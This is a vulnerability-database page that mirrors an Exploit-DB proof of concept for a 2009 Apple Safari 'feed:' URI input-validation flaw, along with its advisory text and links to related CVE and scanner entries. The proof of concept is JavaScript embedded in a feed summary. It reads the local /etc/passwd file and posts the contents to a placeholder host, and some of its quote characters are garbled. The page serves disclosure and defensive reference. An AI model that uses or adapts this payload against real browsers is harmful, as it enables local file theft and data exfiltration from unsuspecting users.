Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbBilly RiosEDB-ID:32994
HistoryMay 12, 2009 - 12:00 a.m.

Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities

2009-05-1200:00:00
Billy Rios
www.exploit-db.com
17

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3. 

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(�GET�, �file:///etc/passwd�, true);
req.send(�);

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(�POST�, �http://www.example.com�, true);
req2.setRequestHeader(�Content-Type�,'application/x-www-form-urlencoded�);
req2.send(�filename=etcpasswd&filecontents=�+escape(stuff));
}
</script>
</summary>

Related

openvas 4
cve 1
prion 1
cvelist 1
nvd 1
nessus 3
securityvulns 2
openvas
openvas
Apple Safari Multiple Vulnerabilities
2009-06-02 00:00:00
Apple Safari Multiple Vulnerabilities
2009-06-02 00:00:00
Mac OS X 10.5.7 Update / Mac OS X Security Update 2009-002
2010-05-12 00:00:00
cve
cve
CVE-2009-0162
2009-05-13 15:30:00
prion
prion
Cross site scripting
2009-05-13 15:30:00
cvelist
cvelist
CVE-2009-0162
2009-05-13 15:14:00
nvd
nvd
CVE-2009-0162
2009-05-13 15:30:00
nessus
nessus
Safari < 3.2.3 Multiple Vulnerabilities
2004-08-18 00:00:00
Safari < 3.2.3 Multiple Vulnerabilities
2009-05-13 00:00:00
Mac OS X 10.5.x < 10.5.7 Multiple Vulnerabilities
2009-05-13 00:00:00
securityvulns
securityvulns
Apple Mac OS X multiple security vulnerabilities
2009-05-29 00:00:00
About the security content of Security Update 2009-002 / Mac OS X v10.5.7
2009-05-14 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:32994
openvas4cve1prion1cvelist1nvd1nessus3securityvulns2